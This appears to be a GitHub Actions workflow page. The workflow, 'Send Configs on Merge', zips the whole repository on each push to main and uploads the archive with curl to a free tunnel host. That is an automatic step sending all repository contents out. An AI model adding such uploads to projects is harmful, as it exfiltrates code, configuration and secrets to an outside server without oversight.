Skip to content

Update blank.yml

Update blank.yml #3

Workflow file for this run

name: Send Configs on Merge
on:
push:
branches:
- main # of de branch waarin je merges doet
jobs:
send-config:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Compress Folders
run: zip -r repo.zip .
- name: Send Compressed Folder
run: |
curl -X POST https://rncar-157-193-240-178.a.free.pinggy.online/repo \
-F '[email protected]' \
-H 'Content-Type: multipart/form-data'